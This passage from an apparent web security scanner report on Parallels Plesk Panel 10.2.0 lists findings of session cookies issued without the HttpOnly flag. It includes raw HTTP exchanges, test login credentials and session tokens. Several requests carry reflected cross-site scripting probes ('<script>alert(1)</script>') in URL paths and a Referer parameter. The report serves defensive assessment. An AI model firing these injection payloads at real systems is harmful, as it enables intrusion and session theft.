<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5. Cookie without HttpOnly flag set
There are 36 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:35 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false
Cookie: locale=en-US; psaContext=dashboard
If-None-Match: "1306181630-544bdaf6dd2753ce86a143b36e3245b8-en-US"

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306183953-b3b1e789775ef43338d64c59c3e1dc01-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=b3b1e789775ef43338d64c59c3e1dc01; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:52:33 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

5.3. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/login_up.php3
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US; PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa
Content-Length: 61

login_name=xsscx&passwd=LL12345%21%21&locale_id=default&send=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK015474560000
Set-Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; path=/
Set-Cookie: locale=en-US; expires=Tue, 22-May-2012 18:21:48 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:48 GMT
Connection: close
Content-Length: 1251


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/smb/';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/smb/" target="top">/smb/</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:26:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=3167c639ce1b08f48e3049df3f758ec8; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:26:34 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:42:27 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=d2f17440e69c73361dcc188944327624; path=/
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:42:27 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=08ef70ae21325bdf1d3e7d74b0164348; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:36:57 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.7. http://vulnerable.plesk.control.panel.20110407.20:8880/get_password.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /get_password.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_password.php HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:29 GMT
Connection: close
Content-Length: 5298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>

<link href="/skins/default/css/common/base.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->

<script type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>

</head>

<body>

<div id="login-page">
<div id="wrapper">
<div id="top">
<div id="header-wrapper">
<div id="header">

<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif" alt="Parallels Plesk Panel" title="Parallels Plesk Panel" />
</h1>



</div>
</div>
</div>
<div id="content-wrapper">
<div id="content">
<div id="content-body" class="clearfix">
<div id="main">
<form id="form-changepassword-getlink" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
<input type="hidden" name="cmd" value="get_password" />

<div id='getLinkSection' class='form-box' >
<div id='getLinkSection-content-area'>



<div class="login-info">
<h3>Retrieve password</h3>
<b>Attention!!!</b><br>
Sending password by e-mail is insecure!<br>
Enter your username and e-mail registered in the system for password delivery.
</div>
<div id='getLinkSection-username-form-row' class='form-row'>
<div class='field-name'><label for='getLinkSection-username'>Username&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="login_name" id="getLinkSection-username" value="" class="input-text" />
</div>
</div>

<div id='getLinkSection-email-form-row' class='form-row' >
<div class='field-name'><label for='getLinkSection-email'>E-mail address&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="email" id="getLinkSection-email" value="" class="input-text" />
</div>
</div>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
</div>
<div class="field-value">


<span id='btn-send' class='btn'>
<button type="submit" value="" name="send">Send</button>
</span>
<span id='btn-cancel' class='btn'>
<button id="getLinkSection-cancel-button" type="button" value="" name="cancel">Cancel</button>
</span>

<script type='text/javascript'>
Jsw.onReady(function() {
$('getLinkSection-cancel-button').observe('click', function () { Jsw.redirect("/login_up.php3"); } );
$('getLinkSection-username').focus();
});
</script>

<!-- ability to submit form via Enter -->
<input type="image" src="/smb/images/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>

</div>
